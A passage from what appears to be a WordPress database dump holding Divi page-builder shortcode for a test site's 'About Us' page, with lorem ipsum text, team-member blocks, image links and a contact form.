button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Privacy Policy','','draft','open','open','','','','','2020-08-18 10:49:35','2020-08-18 10:49:35','',0,'https://wthtest1.in8.cdn-alpha.com/?p=749',0,'post','',0),(750,1,'2020-08-18 10:41:00','2020-08-18 10:41:00','<!-- wp:divi/placeholder /-->','Privacy Policy','','inherit','closed','closed','','749-revision-v1','','','2020-08-18 10:41:00','2020-08-18 10:41:00','',749,'https://wthtest1.in8.cdn-alpha.com/749-revision-v1/',0,'revision','',0),(751,1,'2020-08-18 10:49:34','2020-08-18 10:49:34','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\" column_structure=\"2_3,1_3\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim.</span></p>\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#fcd21d\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#fcd21d\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#fcd21d\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"rgba(252,210,29,0.92)\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" 